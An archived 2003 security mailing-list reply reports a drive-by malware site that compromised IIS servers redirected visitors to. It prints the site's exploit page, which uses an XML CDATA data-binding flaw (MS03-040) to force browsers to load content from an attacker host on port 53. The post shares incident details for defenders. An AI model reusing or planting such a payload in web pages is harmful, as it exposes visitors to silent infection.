RE: Proxy attackers/hijackers

• Previous message: Russell Fulton: "FYI - different ISAPI .ida exploit"
• Maybe in reply to: Thomas Willner: "Proxy attackers/hijackers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Fri, 17 Oct 2003 16:45:20 -0400
To: "Carey, Steve T GARRISON" <steven-carey@us.army.mil>, "Joe Stewart " <jstewart@lurhq.com>, "General DShield Discussion List " <list@dshield.org>

Steve Carey wrote

> The autoproxy Trojan you mentioned is detected by Norton Anti-virus as
> 'backdoor.coreflood Trojan', per the write-up from the site you provided, but
> there is another autoproxy Trojan that is not identified as a Trojan. There is
> a new site (216.247.117.225 - shows up as chinesenaming.com and wvw.goling.com
> (wvw is not a misprint))that is running malicious code when users connect to it
> (with ActiveX enabled).

Add wvw.goling2003.com to the list of other names for 216.247.117.225.

My users did not get to the site through spam links, they were directed there from compromised Interland (again!?) sites running IIS 5.0 and MicrosoftOfficeWebServer 5.0 (also really IIS 5.0). On infected sites, every page generated a new hit to wvw.goling2003.com

Compromised sites were in these networks:
64.225.xx.xx
64.224.xx.xx
The infected pages have since been cleaned.

Connection to this hostname returns different data from the hostnames you listed, although it is the same IP address (I know this is not unusual, just trying to be clear).

http://wvw.goling2003.com
uses XML CDATA Object fixed by MS03-040 to try to force retrieval of:
http://wvw.goling2003.com:53/inf.ooo
That page currently gives a "connection refused" message. Maybe it is used to record who was vulnerable to the CDATA exploit. Users who visited the exploit page did not generate hits to inf.ooo, because their machines were patched, so I don't know if the page previously returned anything else.

Code for wvw.goling2003.com/main.html

<html><body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object data="http://wvw.goling2003.com:53/inf.ooo" width=0 height=0>
]]>
</exploit>
</security>
</xml>
[/body][/html]

---------------------------------------------------------------------------
FREE Whitepaper: Better Management for Network Security

Looking for a better way to manage your IP security?
Learn how Solsoft can help you:
- Ensure robust IP security through policy-based management
- Make firewall, VPN, and NAT rules interoperable across heterogeneous
networks
- Quickly respond to network events from a central console

Download our FREE whitepaper at:
http://www.securityfocus.com/sponsor/Solsoft_incidents_031015
----------------------------------------------------------------------------

• Previous message: Russell Fulton: "FYI - different ISAPI .ida exploit"
• Maybe in reply to: Thomas Willner: "Proxy attackers/hijackers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]